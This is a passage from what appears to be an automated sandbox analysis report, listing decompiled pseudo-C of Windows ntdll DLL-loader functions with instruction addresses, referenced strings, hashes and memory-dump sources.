                                                                  0x0499829b
                                                                  0x04943e35
                                                                  0x04943e38
                                                                  0x04943e3d
                                                                  0x04943e44
                                                                  0x04943e58
                                                                  0x049982a3
                                                                  0x049982a3
                                                                  0x04943e58
                                                                  0x04943e60
                                                                  0x04943e6f
                                                                  0x04943e74
                                                                  0x04943e77
                                                                  0x04943e77
                                                                  0x04943e7a
                                                                  0x04943e7f
                                                                  0x04943e8c
                                                                  0x04943e8c
                                                                  0x04943e91
                                                                  0x00000000
                                                                  0x04943e91

                                                                  Strings
                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 04943E97
                                                                  • WindowsExcludedProcs, xrefs: 04943D6F
                                                                  • Kernel-MUI-Number-Allowed, xrefs: 04943D8C
                                                                  • Kernel-MUI-Language-SKU, xrefs: 04943F70
                                                                  • Kernel-MUI-Language-Allowed, xrefs: 04943DC0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                  • API String ID: 0-258546922
                                                                  • Opcode ID: f61f9d189dffadfc847f71c175556e832e24de2f46073a13872f03bf58a42ad1
                                                                  • Instruction ID: c0dac99f5fccb35281c26a611e5bba8b098a651b7531b944834b3642f387740e
                                                                  • Opcode Fuzzy Hash: f61f9d189dffadfc847f71c175556e832e24de2f46073a13872f03bf58a42ad1
                                                                  • Instruction Fuzzy Hash: AEF11E72D11618EFDF15DF98C980EAEBBBDAF88754F14047AE905A7250E734AE01CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04968E00, Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 44%
                                                                  			E04968E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4a2d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4a28464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4a25780 & 0x00000003) != 0) {
							E049B5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4a25780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0497B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4a27984; // 0x293e68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4a28464; // 0x74790110
					 *0x4a2b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04969B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4a25780 & 0x00000005) != 0) {
						_push(_t49);
						E049B5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                  0x04968e0f
                                                                  0x04968e16
                                                                  0x04968e19
                                                                  0x04968e1b
                                                                  0x04968e21
                                                                  0x04968e7f
                                                                  0x04968e85
                                                                  0x049a9354
                                                                  0x049a936c
                                                                  0x049a9371
                                                                  0x049a937b
                                                                  0x049a9381
                                                                  0x049a9381
                                                                  0x049a937b
                                                                  0x04968e9d
                                                                  0x04968e9d
                                                                  0x04968e29
                                                                  0x04968e2c
                                                                  0x04968e38
                                                                  0x04968e3e
                                                                  0x04968e43
                                                                  0x04968eb5
                                                                  0x04968eb9
                                                                  0x049a92aa
                                                                  0x049a92af
                                                                  0x049a92e8
                                                                  0x049a92e8
                                                                  0x049a92af
                                                                  0x04968eb9
                                                                  0x04968e45
                                                                  0x04968e53
                                                                  0x04968e5b
                                                                  0x04968e5f
                                                                  0x04968e78
                                                                  0x04968e78
                                                                  0x04968e7d
                                                                  0x04968ec3
                                                                  0x04968ecd
                                                                  0x04968ed2
                                                                  0x04968ed2
                                                                  0x04968ec5
                                                                  0x04968ec5
                                                                  0x00000000
                                                                  0x04968e7d
                                                                  0x04968e67
                                                                  0x04968ea4
                                                                  0x049a931a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a9320
                                                                  0x04968ea4
                                                                  0x04968e70
                                                                  0x049a9325
                                                                  0x049a9340
                                                                  0x049a9345
                                                                  0x049a9345
                                                                  0x04968e76
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Strings
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 049A933B, 049A9367
                                                                  • h>), xrefs: 04968E2C
                                                                  • LdrpFindDllActivationContext, xrefs: 049A9331, 049A935D
                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 049A932A
                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 049A9357
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$h>)$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 0-3253554147
                                                                  • Opcode ID: 893baab00e2bc7f4e36bd5514a436548a9bef0c54bd78b27af0c2c26ee36cb22
                                                                  • Instruction ID: 13f2cc29a6c6aab7c11128017ad25ac5b8b1b465dc0a88e3eac54067d25927da
                                                                  • Opcode Fuzzy Hash: 893baab00e2bc7f4e36bd5514a436548a9bef0c54bd78b27af0c2c26ee36cb22
                                                                  • Instruction Fuzzy Hash: 9D412672A02315AFDF36FF18894CA76B2B9FB40318F058979E80A57060E7747C80D6C1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04948794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 83%
                                                                  			E04948794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0494934A() != 0) {
								_t159 = E049BA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4a25780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E049B5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4a25780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0494849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04948999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04948999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4a25c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4a25c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04952280(_t92, 0x4a286cc);
															_t94 = E04A09DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E049661A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4a25c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04948A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4a25c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4a25c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0497F380(_t136, 0x4911184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04952280(_t108, 0x4a286cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E049661A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04A09D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0494FFB0(_t118, _t156, 0x4a286cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04979A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                  0x04948799
                                                                  0x0494879d
                                                                  0x049487a1
                                                                  0x049487a3
                                                                  0x049487a8
                                                                  0x049487c3
                                                                  0x049487c3
                                                                  0x049487c8
                                                                  0x049487d1
                                                                  0x049487d4
                                                                  0x049487d8
                                                                  0x049487e5
                                                                  0x049487ec
                                                                  0x04999bfe
                                                                  0x04999c00
                                                                  0x04999c02
                                                                  0x04999c08
                                                                  0x04999c0d
                                                                  0x04999c0f
                                                                  0x04999c14
                                                                  0x04999c2d
                                                                  0x04999c32
                                                                  0x04999c37
                                                                  0x04999c3a
                                                                  0x04999c3c
                                                                  0x04999c42
                                                                  0x04999c42
                                                                  0x04999c3c
                                                                  0x04999c02
                                                                  0x049487da
                                                                  0x049487df
                                                                  0x049487e3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049487e3
                                                                  0x049487f2
                                                                  0x00000000
                                                                  0x049487fb
                                                                  0x049487fd
                                                                  0x049487fe
                                                                  0x0494880e
                                                                  0x0494880f
                                                                  0x04948810
                                                                  0x04948814
                                                                  0x0494881a
                                                                  0x0494881c
                                                                  0x0494881f
                                                                  0x04948821
                                                                  0x04948822
                                                                  0x04948824
                                                                  0x04948826
                                                                  0x0494882c
                                                                  0x0494882e
                                                                  0x04999c48
                                                                  0x04999c48
                                                                  0x04948834
                                                                  0x04948834
                                                                  0x04948837
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04948837
                                                                  0x0494882e
                                                                  0x0494883d
                                                                  0x04948840
                                                                  0x04948843
                                                                  0x04948846
                                                                  0x04948849
                                                                  0x0494884c
                                                                  0x0494884e
                                                                  0x04948850
                                                                  0x04948852
                                                                  0x04948854
                                                                  0x04948857
                                                                  0x049488b4
                                                                  0x049488b6
                                                                  0x049488b6
                                                                  0x04948859
                                                                  0x04948859
                                                                  0x04948859
                                                                  0x04948861
                                                                  0x04948866
                                                                  0x0494886a
                                                                  0x0494893d
                                                                  0x04948941
                                                                  0x00000000
                                                                  0x04948947
                                                                  0x04948947
                                                                  0x0494894a
                                                                  0x0494894c
                                                                  0x00000000
                                                                  0x04948952
                                                                  0x04948955
                                                                  0x0494895a
                                                                  0x0494895d
                                                                  0x0494895d
                                                                  0x0494895f
                                                                  0x04948961
                                                                  0x04948961
                                                                  0x04948968
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494896a
                                                                  0x0494896b
                                                                  0x0494896e
                                                                  0x00000000
                                                                  0x04948970
                                                                  0x04948970
                                                                  0x04948970
                                                                  0x04948970
                                                                  0x04948972
                                                                  0x04948972
                                                                  0x04948974
                                                                  0x00000000
                                                                  0x0494897a
                                                                  0x0494897a
                                                                  0x0494897d
                                                                  0x00000000
                                                                  0x04948983
                                                                  0x04999c65
                                                                  0x04999c6d
                                                                  0x04999c72
                                                                  0x04999c75
                                                                  0x04999c75
                                                                  0x04999c82
                                                                  0x04999c86
                                                                  0x04999c87
                                                                  0x04999c88
                                                                  0x04999c89
                                                                  0x04999c8c
                                                                  0x04999c90
                                                                  0x04999c95
                                                                  0x04999c97
                                                                  0x04999ca0
                                                                  0x04999ca3
                                                                  0x04999ca9
                                                                  0x04999ca9
                                                                  0x00000000
                                                                  0x04999ca9
                                                                  0x04999ca3
                                                                  0x00000000
                                                                  0x04999c97
                                                                  0x0494897d
                                                                  0x00000000
                                                                  0x04948974
                                                                  0x04948988
                                                                  0x04948992
                                                                  0x04948996
                                                                  0x00000000
                                                                  0x04948996
                                                                  0x0494894c
                                                                  0x00000000
                                                                  0x04948870
                                                                  0x0494887b
                                                                  0x0494887d
                                                                  0x0494887f
                                                                  0x04948881
                                                                  0x04948884
                                                                  0x04948884
                                                                  0x04948886
                                                                  0x04948889
                                                                  0x0494888c
                                                                  0x0494888e
                                                                  0x04948891
                                                                  0x04948891
                                                                  0x04948898
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494889a
                                                                  0x0494889b
                                                                  0x0494889e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049488a0
                                                                  0x049488a8
                                                                  0x049488b0
                                                                  0x049488b2
                                                                  0x049488d3
                                                                  0x049488d5
                                                                  0x00000000
                                                                  0x049488d7
                                                                  0x049488db
                                                                  0x049488dc
                                                                  0x049488e0
                                                                  0x049488e8
                                                                  0x049488ee
                                                                  0x049488f0
                                                                  0x049488f3
                                                                  0x049488fc
                                                                  0x04948901
                                                                  0x04948906
                                                                  0x0494890c
                                                                  0x0494890c
                                                                  0x0494890f
                                                                  0x04948916
                                                                  0x04948917
                                                                  0x04948918
                                                                  0x04948919
                                                                  0x0494891a
                                                                  0x0494891f
                                                                  0x04948921
                                                                  0x04999c52
                                                                  0x04999c55
                                                                  0x04999c5b
                                                                  0x04999cac
                                                                  0x04999cc0
                                                                  0x04999cc0
                                                                  0x04999c55
                                                                  0x04948927
                                                                  0x04948927
                                                                  0x0494892f
                                                                  0x04948933
                                                                  0x00000000
                                                                  0x049488f5
                                                                  0x049488f5
                                                                  0x00000000
                                                                  0x049488f7
                                                                  0x049488f7
                                                                  0x049488fa
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049488fa
                                                                  0x049488f5
                                                                  0x049488f3
                                                                  0x00000000
                                                                  0x049488d5
                                                                  0x00000000
                                                                  0x049488b2
                                                                  0x049488c9
                                                                  0x00000000
                                                                  0x049488c9
                                                                  0x0494887f
                                                                  0x0494886a
                                                                  0x04948857
                                                                  0x04948852
                                                                  0x049488bf
                                                                  0x049488bf
                                                                  0x049487aa
                                                                  0x049487ad
                                                                  0x049487ae
                                                                  0x049487b4
                                                                  0x049487b5
                                                                  0x049487b6
                                                                  0x049487b8
                                                                  0x049487bd
                                                                  0x049487c1
                                                                  0x049487f4
                                                                  0x049487fa
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049487c1
                                                                  0x00000000

                                                                  Strings
                                                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04999C18
                                                                  • LdrpDoPostSnapWork, xrefs: 04999C1E
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 04999C28
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 0-1948996284
                                                                  • Opcode ID: 7693b8dc6050d25b138d8a47461834450e49503bcd2e0554cd32dd5c71a0ae0b
                                                                  • Instruction ID: 2bdff92d3ddd2cd0b82f5c34f066847944da2def0a7b971c7df0ffbd890c63ac
                                                                  • Opcode Fuzzy Hash: 7693b8dc6050d25b138d8a47461834450e49503bcd2e0554cd32dd5c71a0ae0b
                                                                  • Instruction Fuzzy Hash: 0A91D375A0021AAFEF18EF59C881EBA73B9FFC4354B144579E915AB250E730BD01CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04947E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 98%
                                                                  			E04947E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0494CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0493C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4a25780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E049B5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4a25780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04957D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04957D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E049B7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04957D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04957D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E049B7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0496A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0493B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                  0x04947e4c
                                                                  0x04947e50
                                                                  0x04947e55
                                                                  0x04947e58
                                                                  0x04947e5d
                                                                  0x04947e71
                                                                  0x04947f33
                                                                  0x04947e77
                                                                  0x04947e77
                                                                  0x04947e79
                                                                  0x04947e79
                                                                  0x04947e7e
                                                                  0x04947f45
                                                                  0x04999848
                                                                  0x00000000
                                                                  0x04999848
                                                                  0x04947f4e
                                                                  0x04947f53
                                                                  0x04947f5a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499985a
                                                                  0x04999862
                                                                  0x04999866
                                                                  0x00000000
                                                                  0x0499986c
                                                                  0x00000000
                                                                  0x0499986c
                                                                  0x04947e84
                                                                  0x04947e84
                                                                  0x04947e8d
                                                                  0x04999871
                                                                  0x04947eb8
                                                                  0x04947ec0
                                                                  0x04947ec0
                                                                  0x04947e9a
                                                                  0x0499987e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04999884
                                                                  0x0499988b
                                                                  0x049998a7
                                                                  0x049998ac
                                                                  0x049998b1
                                                                  0x049998b6
                                                                  0x049998b8
                                                                  0x049998b8
                                                                  0x049998b9
                                                                  0x00000000
                                                                  0x049998b9
                                                                  0x04947ea0
                                                                  0x04947ea7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04947eac
                                                                  0x04947eb1
                                                                  0x04947ec6
                                                                  0x04947ed0
                                                                  0x049998cc
                                                                  0x04947ed6
                                                                  0x04947ed6
                                                                  0x04947ed6
                                                                  0x04947ede
                                                                  0x04947ee3
                                                                  0x049998e3
                                                                  0x049998f0
                                                                  0x04999902
                                                                  0x049998f2
                                                                  0x049998fb
                                                                  0x049998fb
                                                                  0x04999907
                                                                  0x0499991d
                                                                  0x0499991d
                                                                  0x04999907
                                                                  0x049998e3
                                                                  0x04947ef0
                                                                  0x04947f14
                                                                  0x04947f14
                                                                  0x04947f1e
                                                                  0x04999946
                                                                  0x04947f24
                                                                  0x04947f24
                                                                  0x04947f24
                                                                  0x04947f2c
                                                                  0x0499996a
                                                                  0x04999975
                                                                  0x04999975
                                                                  0x0499997e
                                                                  0x04999993
                                                                  0x04999993
                                                                  0x0499997e
                                                                  0x00000000
                                                                  0x04947ef2
                                                                  0x04947efc
                                                                  0x04947f0a
                                                                  0x04947f0e
                                                                  0x04999933
                                                                  0x00000000
                                                                  0x04999933
                                                                  0x00000000
                                                                  0x04947f0e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04947eb1

                                                                  Strings
                                                                  • LdrpCompleteMapModule, xrefs: 04999898
                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 04999891
                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 049998A2
                                                                  Memory Dump Source
